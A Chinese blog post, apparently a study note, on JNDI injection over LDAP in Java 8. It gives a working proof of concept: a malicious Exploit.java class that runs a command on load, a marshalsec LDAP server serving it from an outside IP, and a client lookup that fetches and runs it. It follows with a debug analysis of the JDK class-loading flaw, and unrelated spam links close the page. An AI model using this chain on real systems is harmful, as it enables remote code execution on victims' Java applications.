JNDI注入和JNDI注入Bypass

2024-02-02 22:30:28

看这个图,就感觉很清晰.

测试ldap攻击:jdk版本选择:jdk8u73 ,测试环境Mac OS

jdk8系列各个版本下载大全:https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

恶意类:Exploit.java:

复制代码
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.io.Serializable;
import java.util.Hashtable;

public class Exploit implements ObjectFactory, Serializable {
public Exploit(){
try{
Runtime.getRuntime().exec(“open /System/Applications/Calculator.app”);
}catch (IOException e){
e.printStackTrace();
}

}

public static void main(String[] args){
    Exploit exploit = new Exploit();
}
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
    return null;
}

}
复制代码

编译成class文件即可.

使用marshalsec构建ldap服务,服务端监听:

/root/jdk-14.0.2/bin/java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://119.45.227.86/#Exploit 6666

客户端发起ldap请求:

客户端代码:

复制代码
import javax.naming.InitialContext;
import javax.naming.NamingException;

public class JNDIClient {
public static void main(String[] args) throws NamingException {
new InitialContext().lookup(“ldap://119.45.227.86:6666/a”);
}
}
复制代码

坑:可能客户端都是jdk8u73,但是发现不能ldap命令执行,八成是vps的原因,对Exploit.java文件编译,要使用较低版本的jdk,我这里编译Exploit.java文件,使用的jdk版本是:

如果你是用jdk>8的版本编译,然后运行ldap服务,是不能执行命令成功的,因为客户端是1.8*版本,请求的class是>1.8的,是不可以的,jdk是向下兼容的,所以建议恶意类文件编译采用jdk<=1.8版本,为了稳定期间选择我这里jdk1.6.

jndi ldap执行命令原理分析刨析:

debug:

跟进去,深入跟踪函数一直到这里:

getObjectFactoryFromReference:

文件地址:/Library/Java/JavaVirtualMachines/jdk1.8.0_73.jdk/Contents/Home/jre/lib/rt.jar!/javax/naming/spi/NamingManager.class:

可通过反射加载进去单独设置debug:

复制代码
static ObjectFactory getObjectFactoryFromReference(
Reference ref, String factoryName)
throws IllegalAccessException,
InstantiationException,
MalformedURLException {
Class<?> clas = null;

    // Try to use current class loader
    try {
         clas = helper.loadClass(factoryName);
    } catch (ClassNotFoundException e) {
        // ignore and continue
        // e.printStackTrace();
    }
    // All other exceptions are passed up.

    // Not in class path; try to use codebase
    String codebase;
    if (clas == null &&
            (codebase = ref.getFactoryClassLocation()) != null) {
        try {
            clas = helper.loadClass(factoryName, codebase);
        } catch (ClassNotFoundException e) {
        }
    }

    return (clas != null) ? (ObjectFactory) clas.newInstance() : null;
}
USB Microphone  https://www.soft-voice.com/

Wooden Speakers https://www.zeshuiplatform.com/
亚马逊测评 www.yisuping.cn
深圳网站建设www.sz886.com

上一篇:[原创]关于ORACLE的使用入门


下一篇:Codeforces Round #271 (Div. 2) E题 Pillars(线段树维护DP)